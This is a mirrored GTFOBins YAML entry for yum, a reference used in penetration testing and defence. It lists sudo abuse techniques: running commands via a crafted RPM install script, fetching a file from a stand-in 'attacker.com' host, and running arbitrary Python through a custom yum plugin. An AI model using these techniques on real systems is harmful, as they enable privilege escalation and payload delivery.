mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
Rationale being that: - it's easy to just forget it; - entries that only have the unprivileged context are quite rare.
52 lines
1.3 KiB
Plaintext
---
functions:
  command:
    - code: |-
        yum localinstall -y x-1.0-1.noarch.rpm
      comment: |-
        Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.

        ```
        echo /path/to/command >x.sh
        fpm -n x -s dir -t rpm -a all --before-install .x.sh .
        ```
      contexts:
        sudo:
  download:
    - code: |-
        yum install http://attacker.com/path/to/input-file.rpm
      comment: |-
        The file on the remote host must have the `.rpm` extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp/yum-root-xxxxxx/`.
      contexts:
        sudo:
      sender: http-server
  inherit:
    - code: |-
        cat >/path/to/temp-dir/x<<EOF
        [main]
        plugins=1
        pluginpath=/path/to/temp-dir/
        pluginconfpath=/path/to/temp-dir/
        EOF

        cat >/path/to/temp-dir/y.conf<<EOF
        [main]
        enabled=1
        EOF

        cat >/path/to/temp-dir/y.py<<EOF
        import yum
        from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
        requires_api_version='2.1'
        def init_hook(conduit):
            ...
        EOF

        yum -c /path/to/temp-dir/x --enableplugin=y
      comment: |-
        This allows to run Python code (`...`).
      contexts:
        sudo:
      from: python
...